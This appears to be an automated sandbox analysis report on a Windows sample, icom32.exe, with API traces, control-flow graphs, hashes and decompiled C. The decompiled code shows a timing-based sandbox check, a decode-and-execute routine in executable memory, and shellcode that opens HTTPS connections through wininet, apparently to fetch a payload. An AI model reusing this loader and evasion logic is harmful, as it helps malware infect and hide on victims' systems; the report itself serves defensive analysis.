        0x00406d8f
        0x00406d94
        0x00406da4
        0x00406dab
        0x00406dad
        0x00406db5
        0x00406dd4
        0x00406dd5
        0x00406dd7
        0x00406de4
        0x00406de4
        0x00406de7
        0x00406de9
        0x00406de9
        0x00406dc4
        0x00406dcf
        0x00406dd1
        0x00000000
        0x00406dd1
        0x00406df3
        0x00406dfe
        0x00406e00
        0x00406e67
        0x00406e6c
        0x00406e6c
        0x00406e71
        0x00406e73
        0x00406e8e
        0x00406e9b
        0x00406ea5
        0x00406eaa
        0x00406ebc
        0x00406e75
        0x00406e7d
        0x00406e7d
        0x00406e73
        0x00406e06
        0x00406e0d
        0x00406e10
        0x00406e15
        0x00406e19
        0x00406e3a
        0x00406e3d
        0x00406e40
        0x00406e51
        0x00406e51
        0x00406e55
        0x00406e57
        0x00406e57
        0x00406e28
        0x00406e28
        0x00406e2c
        0x00406e33
        0x00000000
        0x00000000
        0x00406e35
        0x00406e35
        0x00000000
        0x00000000
        0x00000000
        0x00000000
        0x00406e42
        0x00406e42
        0x00406e42
        0x00406e46
        0x00000000
        0x00000000
        0x00406e48
        0x00406e4b
        0x00406e4f
        0x00000000
        0x00000000
        0x00000000
        0x00406e4f
        0x00000000
        0x00000000
        0x00000000
        0x00000000
        0x00406e1b
        0x00406e1b
        0x00406e1f
        0x00406e26
        0x00000000
        0x00000000
        0x00406e5c
        0x00406e60
        0x00000000
        0x00000000
        0x00406e62
        0x00406e62
        0x00000000
        0x00000000
        0x00000000
        0x00000000
        0x00406dd9
        0x00406dd9
        0x00406dd9
        0x00406ddc
        0x00000000
        0x00000000
        0x00406dde
        0x00406ddf
        0x00406de2
        0x00000000
        0x00000000
        0x00000000
        0x00406de2
        0x00000000
        0x00000000
        0x00000000
        0x00000000
        0x00406db7
        0x00406db7
        0x00406db9
        0x00406dc2
        0x00000000
        0x00000000
        0x00406dec
        0x00406dee
        0x00000000
        0x00406df0
        0x00406df0
        0x00000000
        0x00406df0
        0x00406dee
        0x00000000

        APIs
          • Part of subcall function 00408AC0: GetStdHandle.KERNEL32(000000F6,?,?,00406CF7,?,?,?,00406F40,?,?,?,00000108,0040739C), ref: 00408ACE
          • Part of subcall function 00408AC0: GetStdHandle.KERNEL32(000000F5,?,?,00406CF7,?,?,?,00406F40,?,?,?,00000108,0040739C), ref: 00408AEB
          • Part of subcall function 00408AC0: GetStdHandle.KERNEL32(000000F4,?,?,00406CF7,?,?,?,00406F40,?,?,?,00000108,0040739C), ref: 00408B03
        • GetEnvironmentStringsA.KERNEL32(?,?,?,00406F40,?,?,?,00000108,0040739C), ref: 00406CF7
        • GetVersion.KERNEL32(?,?,?,00406F40,?,?,?,00000108,0040739C), ref: 00406D09
        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\icom32.exe,00000104,?,?,?,00406F40,?,?,?,00000108,0040739C), ref: 00406D78
          • Part of subcall function 00408BF0: GetVersion.KERNEL32(?,00000000,00000000,?,00406D94,?,?,?,00406F40,?,?,?,00000108,0040739C), ref: 00408BFA
        • GetCommandLineA.KERNEL32(?,?,?,00406F40,?,?,?,00000108,0040739C), ref: 00406D9E
        • GetCommandLineW.KERNEL32(?,?,?,00406F40,?,?,?,00000108,0040739C), ref: 00406DF8
        • GetModuleFileNameA.KERNEL32(00000000,00410334,00000104,?,?,?,00406F40,?,?,?,00000108,0040739C), ref: 00406E8E
          • Part of subcall function 00408BF0: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\icom32.exe,00000208,?,00000000,00000000,?,00406D94,?,?,?,00406F40,?,?,?,00000108), ref: 00408C21
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.780346891.0000000000405000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.780335115.0000000000400000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.780340233.0000000000401000.00000020.00020000.sdmp Download File
        • Associated: 00000000.00000002.780357265.000000000040E000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.780365618.0000000000411000.00000002.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_icom32.jbxd
        Similarity
        • API ID: FileHandleModuleName$CommandLineVersion$EnvironmentStrings
        • String ID: C:\Users\user\Desktop\icom32.exe$C:\Users\user\Desktop\icom32.exe
        • API String ID: 3182714229-1161640841
        • Opcode ID: e1ad09644496fb7ce1881a70044663e67e1c74f9e80c2aed997b6ff80cf03d93
        • Instruction ID: 1ab74da2d637754d5f1abda7a5b02a3bc60c499ea5c9c2eeb27cc7c59e59ec54
        • Opcode Fuzzy Hash: e1ad09644496fb7ce1881a70044663e67e1c74f9e80c2aed997b6ff80cf03d93
        • Instruction Fuzzy Hash: 65418F75A153419EE321AF39DD093923BA2AB46304B19807AD082EB7E2D7BC44A9C75C
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 92 7000d7-700118 HttpOpenRequestA 95 7002e8-7002ed ExitProcess 92->95 96 70011e-700122 92->96 97 700124-700126 96->97 98 700128-70012f 96->98 99 700131-70014e 97->99 98->99 103 700150-700169 call 7000d7 99->103 104 700157-70030d 99->104 112 70016b-70016d 103->112 113 7001de-7001e9 103->113 110 70030f-700320 104->110 110->95 124 700322-700328 110->124 116 7001d4 112->116 117 70016f 112->117 114 7001ec 113->114 122 700253-70025f 114->122 123 7001ee 114->123 120 700210-70021c 116->120 121 7001d6-7001d9 116->121 118 700171-700191 117->118 119 7001da-7001dd 117->119 125 700193-7001b5 118->125 126 7001b7-7001bc 118->126 119->113 127 70021d-70021f 120->127 121->119 128 700247 121->128 129 700261-700263 122->129 130 700285-700293 122->130 123->127 131 7001f0-7001f4 123->131 124->110 132 70032a-70032b 124->132 125->126 134 700232 126->134 135 7001bd 126->135 133 700294-700298 127->133 136 700221-70022d 127->136 137 700248-700252 128->137 138 700264-700266 129->138 130->133 139 700230 131->139 140 7001f6-7001f9 131->140 141 70029d-7002a3 133->141 134->141 143 700234-700237 134->143 135->114 142 7001be-7001cd 135->142 136->139 137->122 144 700268-700269 138->144 139->134 140->138 145 7001fb-700207 140->145 146 7002a5-7002c7 141->146 147 7002c9-7002e7 141->147 142->137 148 7001cf 142->148 143->144 149 700239-700242 143->149 150 70026a-70026f 144->150 145->150 151 700209 145->151 146->147 147->95 148->116 149->128 152 700274-700283 150->152 151->152 153 70020b-70020f 151->153 152->130 153->120
        APIs
        • HttpOpenRequestA.WININET(3B2E55EB,00000000,00000000,00700168,00000000,00000000,00000000,84C03200,00000000,00000000,?,696E6977,0074656E), ref: 007000EB
        • ExitProcess.KERNEL32(56A2B5F0,?,696E6977,0074656E), ref: 007002ED
        Strings
        • @AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$, xrefs: 0070017D
        Memory Dump Source
        • Source File: 00000000.00000002.780692160.0000000000700000.00000040.00000001.sdmp, Offset: 00700000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_700000_icom32.jbxd
        Yara matches
        Similarity
        • API ID: ExitHttpOpenProcessRequest
        • String ID: @AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$
        • API String ID: 4217525295-4015130067
        • Opcode ID: 8a3a5e192a520bbb4d007ee9a9ae763f2622d1b439e3a0c0fe30cccbe4347ed8
        • Instruction ID: 738065eef18c2d967a5217f59674689903b3903cd3a2523b50a9e7221ddd40b4
        • Opcode Fuzzy Hash: 8a3a5e192a520bbb4d007ee9a9ae763f2622d1b439e3a0c0fe30cccbe4347ed8
        • Instruction Fuzzy Hash: D2718BB6069295BEE7258E368D8EF377B9CFF93725B20421DF191860C3D5549802C2A6
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 154 7000ba-700169 InternetConnectA call 7000d7 159 70016b-70016d 154->159 160 7001de-7001e9 154->160 162 7001d4 159->162 163 70016f 159->163 161 7001ec 160->161 168 700253-70025f 161->168 169 7001ee 161->169 166 700210-70021c 162->166 167 7001d6-7001d9 162->167 164 700171-700191 163->164 165 7001da-7001dd 163->165 170 700193-7001b5 164->170 171 7001b7-7001bc 164->171 165->160 172 70021d-70021f 166->172 167->165 173 700247 167->173 174 700261-700263 168->174 175 700285-700293 168->175 169->172 176 7001f0-7001f4 169->176 170->171 178 700232 171->178 179 7001bd 171->179 177 700294-700298 172->177 180 700221-70022d 172->180 181 700248-700252 173->181 182 700264-700266 174->182 175->177 183 700230 176->183 184 7001f6-7001f9 176->184 185 70029d-7002a3 177->185 178->185 187 700234-700237 178->187 179->161 186 7001be-7001cd 179->186 180->183 181->168 188 700268-700269 182->188 183->178 184->182 189 7001fb-700207 184->189 190 7002a5-7002c7 185->190 191 7002c9-7002ed ExitProcess 185->191 186->181 192 7001cf 186->192 187->188 193 700239-700242 187->193 194 70026a-70026f 188->194 189->194 195 700209 189->195 190->191 192->162 193->173 196 700274-700283 194->196 195->196 197 70020b-70020f 195->197 196->175 197->166
        APIs
        • InternetConnectA.WININET(C69F8957,00000000,00700331,000001BB,00000000,00000000,00000003,00000000,00000000,?,696E6977,0074656E), ref: 007000CF
          • Part of subcall function 007000D7: HttpOpenRequestA.WININET(3B2E55EB,00000000,00000000,00700168,00000000,00000000,00000000,84C03200,00000000,00000000,?,696E6977,0074656E), ref: 007000EB
        • ExitProcess.KERNEL32(56A2B5F0,?,696E6977,0074656E), ref: 007002ED
        Strings
        • @AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$, xrefs: 0070017D
        Memory Dump Source
        • Source File: 00000000.00000002.780692160.0000000000700000.00000040.00000001.sdmp, Offset: 00700000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_700000_icom32.jbxd
        Yara matches
        Similarity
        • API ID: ConnectExitHttpInternetOpenProcessRequest
        • String ID: @AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$
        • API String ID: 3864964405-4015130067
        • Opcode ID: 58743714b21e5df703cd851a87d1fc4d967c688b5f0ba4f496d9465c8c31b24a
        • Instruction ID: bb1cfe32e6764618f343dc813224870c2fdbc1ea2253e9256ac350623d7b786d
        • Opcode Fuzzy Hash: 58743714b21e5df703cd851a87d1fc4d967c688b5f0ba4f496d9465c8c31b24a
        • Instruction Fuzzy Hash: 14516BBA07C2D6AEE7198F348A9E9377B9CFE23725710524DE1D2850C3D194A81383A2
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 199 406600-40660c 200 406612-40661b 199->200 201 4067ab-4067be 199->201 202 406626-406643 GetTimeZoneInformation 200->202 203 40661d-406620 200->203 205 4067d7-4067fa 202->205 206 406649-406674 202->206 203->202 204 40679b-4067aa 203->204 207 406676 206->207 208 40667c-406692 call 408740 206->208 207->208 211 406698-4066b5 call 408740 208->211 212 4067bf 208->212 215 4067cb 211->215 216 4066bb-406796 211->216 212->215 215->205 216->204
        C-Code - Quality: 100%
        			E00406600(void* __eax) {
        				intOrPtr _v20;
        				void* _v24;
        				void* _v26;
        				void* _v28;
        				void* _v30;
        				void* _v32;
        				void* _v34;
        				void* _v36;
        				char _v100;
        				intOrPtr _v104;
        				void* _v108;
        				void* _v110;
        				void* _v112;
        				void* _v114;
        				void* _v116;
        				void* _v118;
        				void* _v120;
        				char _v184;
        				void* __ebx;
        				void* __edx;
        				signed char _t28;
        				long _t30;
        				void* _t39;
        				void* _t41;
        				intOrPtr _t73;
        				intOrPtr _t76;
        				struct _TIME_ZONE_INFORMATION* _t80;
        
        				if(__eax != 0) {
        					 *0x40f508 =  *0x40f508 & 0x000000fd;
        					return 0;
        				} else {
        					_t28 =  *0x40f508; // 0x3
        					if((_t28 & 0x00000001) == 0 || (_t28 & 0x00000002) == 0) {
        						 *0x40f500 = 1;
        						 *0x40f508 =  *0x40f508 | 0x00000002; // executed
        						_t30 = GetTimeZoneInformation(_t80); // executed
        						if(_t30 > 2) {
        							 *0x40f4fc = 0x4650;
        							 *0x40f504 = 0xe10;
        							return 1;
        						} else {
        							_t76 = _v104;
        							 *0x40f4fc = (_t80->Bias + _t76) * 0x3c;
        							_t73 = _v20;
        							 *0x40f504 = (_v20 - _t76) * 0xffffffc4;
        							if(_t73 == 0) {
        								 *0x40f500 = _t73;
        							}
        							_t39 = E00408740("W. Europe Standard Time", 0x80,  &_v184);
        							if(_t39 != 0xffffffff) {
        								 *((char*)(_t39 + "W. Europe Standard Time")) = 0;
        							} else {
        								"W. Europe Standard Time" = 0;
        							}
        							_t41 = E00408740("W. Europe Daylight Time", 0x80,  &_v100);
        							if(_t41 != 0xffffffff) {
        								 *((char*)(_t41 + "W. Europe Daylight Time")) = 0;
        							} else {
        								"W. Europe Daylight Time" = 0;
        							}
        							 *0x40f3a8 = 0;
        							 *0x40f3ac = 0;
        							 *0x40f3b0 = 0;
        							 *0x40f3b4 = 0;
        							 *0x40f3b8 = 0xffffffffffffffff;
        							 *0x40f3bc = 0;
        							 *0x40f3c0 = 0;
        							 *0x40f3cc = 0;
        							 *0x40f3d0 = 0;
        							 *0x40f3d4 = 0;
        							 *0x40f3d8 = 0;
        							 *0x40f3dc = 0xffffffffffffffff;
        							 *0x40f3c4 = 0;
        							 *0x40f3c8 = 0;
        							 *0x40f3e0 = 0;
        							 *0x40f3e8 = 0;
        							 *0x40f3ec = 0;
        							 *0x40f3e4 = 0;
        							goto L11;
        						}
        					} else {
        						L11:
        						return 1;
        					}
        				}
        			}






























        0x0040660c
        0x004067ab
        0x004067be
        0x00406612
        0x00406612
        0x0040661b
        0x00406629
        0x00406633
        0x0040663a
        0x00406643
        0x004067d7
        0x004067e1
        0x004067fa
        0x00406649
        0x0040664c
        0x00406655
        0x00406666
        0x0040666d
        0x00406674
        0x00406676
        0x00406676
        0x0040668a
        0x00406692
        0x004067bf
        0x00406698
        0x00406698
        0x00406698
        0x004066ad
        0x004066b5
        0x004067cb
        0x004066bb
        0x004066bb
        0x004066bb
        0x004066cc
        0x004066db
        0x004066ea
        0x004066f9
        0x00406709
        0x00406718
        0x00406727
        0x00406733
        0x0040673f
        0x0040674b
        0x00406757
        0x00406766
        0x0040676d
        0x00406778
        0x0040677e
        0x00406785
        0x00406790
        0x00406796
        0x00000000
        0x00406796
        0x0040679b
        0x0040679b
        0x004067aa
        0x004067aa
        0x0040661b

        APIs
        • GetTimeZoneInformation.KERNELBASE ref: 0040663A
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.780346891.0000000000405000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.780335115.0000000000400000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.780340233.0000000000401000.00000020.00020000.sdmp Download File
        • Associated: 00000000.00000002.780357265.000000000040E000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.780365618.0000000000411000.00000002.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_icom32.jbxd
        Similarity
        • API ID: InformationTimeZone
        • String ID: W. Europe Daylight Time$W. Europe Standard Time
        • API String ID: 565725191-986674615
        • Opcode ID: 85a8e670cbc73a0d3c6b68df26a3ccb44cc4220f7f6c9fd526d3ede61076a217
        • Instruction ID: c90e11ea19efc78333c6ee6619a9f6a91a5bad6b7bf520ff5c0d62c00a7e0627
        • Opcode Fuzzy Hash: 85a8e670cbc73a0d3c6b68df26a3ccb44cc4220f7f6c9fd526d3ede61076a217
        • Instruction Fuzzy Hash: 154180796183418ED320CF39EE407567BE1AB95720F11893AED98E3BA1F374844DCB1A
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        C-Code - Quality: 100%
        			E004097B0() {
        				_Unknown_base(*)()* _t1;
        
        				_t1 = SetUnhandledExceptionFilter(E00409360); // executed
        				if(_t1 != 0) {
        					return SetUnhandledExceptionFilter(_t1);
        				} else {
        					return _t1;
        				}
        			}




        0x004097b7
        0x004097bf
        0x004097cd
        0x004097c3
        0x004097c3
        0x004097c3

        APIs
        • SetUnhandledExceptionFilter.KERNELBASE(00409360,?,?,00406F2D,?,?,?,00000108,0040739C), ref: 004097B7
        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,00406F2D,?,?,?,00000108,0040739C), ref: 004097C5
        Memory Dump Source
        • Source File: 00000000.00000002.780346891.0000000000405000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.780335115.0000000000400000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.780340233.0000000000401000.00000020.00020000.sdmp Download File
        • Associated: 00000000.00000002.780357265.000000000040E000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.780365618.0000000000411000.00000002.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_icom32.jbxd
        Similarity
        • API ID: ExceptionFilterUnhandled
        • String ID:
        • API String ID: 3192549508-0
        • Opcode ID: de6798b6283f7c1abeb6d1da2a164cb434f66907654042ba3109f2104da689c3
        • Instruction ID: 52ca0843df3dfcc92a0733aeeff1ca781e89286c72fe80894f0f93a2ef2e31bb
        • Opcode Fuzzy Hash: de6798b6283f7c1abeb6d1da2a164cb434f66907654042ba3109f2104da689c3
        • Instruction Fuzzy Hash: C1C08CF2310100EEFA084B237F4D93A2B1CD5C0B22330843FF207A40D1DB3448229439
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 217 40c390-40c3ab call 4089f0 GetFileType
        C-Code - Quality: 100%
        			E0040C390(void* __eflags) {
        				void* _t3;
        				signed int _t5;
        
        				_t5 = GetFileType(E004089F0(_t3)); // executed
        				return (_t5 & 0xffffff00 | _t5 == 0x00000002) & 0x000000ff;
        			}





        0x0040c398
        0x0040c3ab

        APIs
        • GetFileType.KERNELBASE(00000000,Tm,004073A1,0040A225,Tm,?,0040789A,?,004073A1,?,00405A43,?,?,?,?,004054EC), ref: 0040C398
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.780346891.0000000000405000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.780335115.0000000000400000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.780340233.0000000000401000.00000020.00020000.sdmp Download File
        • Associated: 00000000.00000002.780357265.000000000040E000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.780365618.0000000000411000.00000002.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_icom32.jbxd
        Similarity
        • API ID: FileType
        • String ID: Tm
        • API String ID: 3081899298-1983248850
        • Opcode ID: b8a21e23f9ab715022278e78b7a81fda4b90f9d2f1d498bc3fa3a32933c5ee16
        • Instruction ID: 635ee0aa3c2b8f6f388d84785f478b042f7bca3d1dbbed953bf25a4394c760ce
        • Opcode Fuzzy Hash: b8a21e23f9ab715022278e78b7a81fda4b90f9d2f1d498bc3fa3a32933c5ee16
        • Instruction Fuzzy Hash: 1CB092FB16460259EA283372AE4EA3E161CEB80321B248D3EF003E44D38E3C94506039
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 223 7000a7-70032c InternetOpenA call 7000ba 227 700331-700859 223->227 230 70085b 227->230 231 70085c-700861 227->231 230->231 232 700863-700890 231->232 233 7008b8-700922 231->233 237 700892 232->237 238 700893-7008ac 232->238 237->238
        APIs
        • InternetOpenA.WININET(A779563A,00000000,00000000,00000000,00000000,00000000,007000A7,?,696E6977,0074656E), ref: 007000B3
          • Part of subcall function 007000BA: InternetConnectA.WININET(C69F8957,00000000,00700331,000001BB,00000000,00000000,00000003,00000000,00000000,?,696E6977,0074656E), ref: 007000CF
        Memory Dump Source
        • Source File: 00000000.00000002.780692160.0000000000700000.00000040.00000001.sdmp, Offset: 00700000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_700000_icom32.jbxd
        Yara matches
        Similarity
        • API ID: Internet$ConnectOpen
        • String ID:
        • API String ID: 2790792615-0
        • Opcode ID: b03323c2e244ca8ccf8c72cf7377ca56a5f56506497ad87a6f32117f72b9f516
        • Instruction ID: 9dbb87f7892267452d34367f39cd9cc376fe83565b07e28a602667b9fc51fdbf
        • Opcode Fuzzy Hash: b03323c2e244ca8ccf8c72cf7377ca56a5f56506497ad87a6f32117f72b9f516
        • Instruction Fuzzy Hash: A141EF7148A386CFD3934B7098651C17BF4BE5333872941EED481CA5A3E2AE4D87CB92
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        C-Code - Quality: 88%
        			E004013E0(intOrPtr __eax, intOrPtr __edx, void* __fp0) {
        				intOrPtr _v24;
        				intOrPtr _v28;
        				intOrPtr _v32;
        				void* _v36;
        				void* _v40;
        				intOrPtr _v44;
        				intOrPtr _v48;
        				void* __ebx;
        				void* _t27;
        				long _t39;
        				long _t41;
        
        				_v48 = __eax;
        				_v44 = __edx;
        				_v28 = E00401010(0);
        				if(_v28 >= 0) {
        					Sleep(0x7530); // executed
        					_v24 = E00401010(0);
        					if(_v24 >= 0) {
        						if(_v24 - _v28 >= 0x1c) {
        							_t27 = VirtualAlloc(0,  *0x4014b0, 0x3000, 0x40); // executed
        							_v36 = _t27;
        							_t41 =  *0x4014b0; // 0x1961
        							_v32 = E00401310(0x4014bc, _t41, __fp0);
        							_t39 =  *0x4014b0; // 0x1961
        							E00405840(_v36, _t39, _v32);
        							E00405860(_v32);
        							_v36();
        							_v40 = 0;
        						} else {
        							E004013B0();
        							_v40 = 0;
        						}
        					} else {
        						E004013B0();
        						_v40 = 0;
        					}
        				} else {
        					E004013B0();
        					_v40 = 0;
        				}
        				return _v40;
        			}














        0x004013ed
        0x004013f0
        0x004013fa
        0x00401401
        0x00401419
        0x00401426
        0x0040142d
        0x00401446
        0x00401465
        0x0040146b
        0x0040146e
        0x0040147e
        0x00401481
        0x0040148d
        0x00401495
        0x0040149a
        0x0040149d
        0x00401448
        0x00401448
        0x0040144d
        0x0040144d
        0x0040142f
        0x0040142f
        0x00401434
        0x00401434
        0x00401403
        0x00401403
        0x00401408
        0x00401408
        0x004014ae

        APIs
          • Part of subcall function 00401010: WSAStartup.WS2_32(00000202,?), ref: 00401035
          • Part of subcall function 00401010: WSAGetLastError.WS2_32 ref: 0040103F
        • Sleep.KERNELBASE(00007530,?,?,00000108,00409DA4), ref: 00401419
          • Part of subcall function 004013B0: MessageBoxA.USER32 ref: 004013D1
        Memory Dump Source
        • Source File: 00000000.00000002.780340233.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.780335115.0000000000400000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.780346891.0000000000405000.00000020.00020000.sdmp Download File
        • Associated: 00000000.00000002.780357265.000000000040E000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.780365618.0000000000411000.00000002.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_icom32.jbxd
        Similarity
        • API ID: ErrorLastMessageSleepStartup
        • String ID:
        • API String ID: 99729575-0
        • Opcode ID: 3759a16f545ec28d4a32291382bd5c52e45aa4e5ebaebd88d0e51f5404919085
        • Instruction ID: d203aa3f00607ad04c758af9c7c462f385366fb73d2fe40a57cd753bf865eb1a
        • Opcode Fuzzy Hash: 3759a16f545ec28d4a32291382bd5c52e45aa4e5ebaebd88d0e51f5404919085
        • Instruction Fuzzy Hash: D1212E70D002089FDB00EFA5D989BAFBBB0EF44359F50457AF501B72A1D77C5A409BA9
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 265 40a660-40a681 call 40c570 CharUpperA call 40a620 269 40a686-40a68b 265->269
        C-Code - Quality: 100%
        			E0040A660() {
        				char _v10;
        				char _v11;
        				void* __edx;
        				void* _t3;
        				CHAR* _t11;
        
        				_v11 = 0;
        				_v10 = 0;
        				E0040C570(_t3, _t11);
        				CharUpperA(_t11); // executed
        				return E0040A620(_t11);
        			}








        0x0040a667
        0x0040a66b
        0x0040a671
        0x0040a679
        0x0040a68b

        APIs
        • CharUpperA.USER32(?,0040569C,00000108,004012E5), ref: 0040A679
        Memory Dump Source
        • Source File: 00000000.00000002.780346891.0000000000405000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.780335115.0000000000400000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.780340233.0000000000401000.00000020.00020000.sdmp Download File
        • Associated: 00000000.00000002.780357265.000000000040E000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.780365618.0000000000411000.00000002.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_icom32.jbxd
        Similarity
        • API ID: CharUpper
        • String ID:
        • API String ID: 9403516-0
        • Opcode ID: 8d7bf7076c05b62678fd30f6f2e00f56e7bd62dffe09178eb605b327429d5de0
        • Instruction ID: c2f2f6c128974beaedef215e064c14e92f817ec8314dafa4f85048492d1a9ca6
        • Opcode Fuzzy Hash: 8d7bf7076c05b62678fd30f6f2e00f56e7bd62dffe09178eb605b327429d5de0
        • Instruction Fuzzy Hash: A4D0A7AAA0C3406EE44473362C4B44B3E254DE2114B18C53DF045532C1D839D81CC1A7
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 270 70008f-7000a2 LoadLibraryA call 7000a7
        APIs
        • LoadLibraryA.KERNELBASE(0726774C,?,696E6977,0074656E), ref: 007000A0
        Memory Dump Source
        • Source File: 00000000.00000002.780692160.0000000000700000.00000040.00000001.sdmp, Offset: 00700000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_700000_icom32.jbxd
        Yara matches
        Similarity
        • API ID: LibraryLoad
        • String ID:
        • API String ID: 1029625771-0
        • Opcode ID: 5a947e7f3338d89dec675f7ce1a8893158c68d3fedbd9699ec035027427ea175
        • Instruction ID: f6ac63cb588013cfe5c088028ed93f17fa7e1303260ebbbc7ebb43fe486b4e6b
        • Opcode Fuzzy Hash: 5a947e7f3338d89dec675f7ce1a8893158c68d3fedbd9699ec035027427ea175
        • Instruction Fuzzy Hash: 60A002C06DF30DF785427A729D0BF6D7D558903BB9B815212F59D249CA098F517440B7
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 272 4072a0-4072af 273 4072b1-4072b8 272->273 274 4072bc-4072c1 272->274 275 4072c2-4072cb call 407250 273->275 276 4072ba 273->276 275->274 279 4072cd-4072e5 VirtualAlloc 275->279 276->274 279->274 280 4072e7-4072f0 279->280 280->276 281 4072f2-4072f8 280->281 281->276 282 4072fa-40732a call 4071d0 call 405860 281->282
        C-Code - Quality: 100%
        			E004072A0(long __eax) {
        				long _v12;
        				void* _t7;
        				void _t10;
        				signed char* _t13;
        				signed char _t14;
        				signed char* _t20;
        				void* _t21;
        				void* _t22;
        
        				_v12 = __eax;
        				_t7 =  *0x40f5ec; // 0x1
        				if(_t7 == 0) {
        					L3:
        					return _t7;
        				} else {
        					if( *0x40f560 == 0xfffffffe) {
        						L2:
        						return 0;
        					}
        					_t7 = E00407250(_t22);
        					if(_t7 == 0) {
        						goto L3;
        					} else {
        						_t7 = VirtualAlloc(0, _v12, 0x1000, 0x40); // executed
        						_t21 = _t7;
        						if(_t7 == 0) {
        							goto L3;
        						} else {
        							_t10 = _v12 - 4;
        							if(_t10 > _v12) {
        								goto L2;
        							}
        							_v12 = _t10;
        							if(_t10 < 0x38) {
        								goto L2;
        							}
        							 *_t21 = _t10;
        							_t13 = E004071D0(_t21);
        							_t20 = _t13;
        							_t14 =  *_t13;
        							_v12 = _t14;
        							 *_t20 = _t14 | 0x00000001;
        							 *(_t21 + 0x14) = 0;
        							_t3 =  &(_t20[4]); // 0x4
        							 *((intOrPtr*)(_t21 + 0x18)) =  *((intOrPtr*)(_t21 + 0x18)) + 1;
        							E00405860(_t3);
        							return 1;
        						}
        					}
        				}
        			}











        0x004072a5
        0x004072a8
        0x004072af
        0x004072c1
        0x004072c1
        0x004072b1
        0x004072b8
        0x004072ba
        0x00000000
        0x004072ba
        0x004072c4
        0x004072cb
        0x00000000
        0x004072cd
        0x004072db
        0x004072e1
        0x004072e5
        0x00000000
        0x004072e7
        0x004072ea
        0x004072f0
        0x00000000
        0x00000000
        0x004072f2
        0x004072f8
        0x00000000
        0x00000000
        0x004072fa
        0x004072fe
        0x00407303
        0x00407305
        0x00407307
        0x0040730c
        0x0040730e
        0x00407315
        0x00407318
        0x0040731b
        0x0040732a
        0x0040732a
        0x004072e5
        0x004072cb

        APIs
        • VirtualAlloc.KERNELBASE(00000000,00001000,00001000,00000040,00000000,004057D7), ref: 004072DB
        Memory Dump Source
        • Source File: 00000000.00000002.780346891.0000000000405000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.780335115.0000000000400000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.780340233.0000000000401000.00000020.00020000.sdmp Download File
        • Associated: 00000000.00000002.780357265.000000000040E000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.780365618.0000000000411000.00000002.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_icom32.jbxd
        Similarity
        • API ID: AllocVirtual
        • String ID:
        • API String ID: 4275171209-0
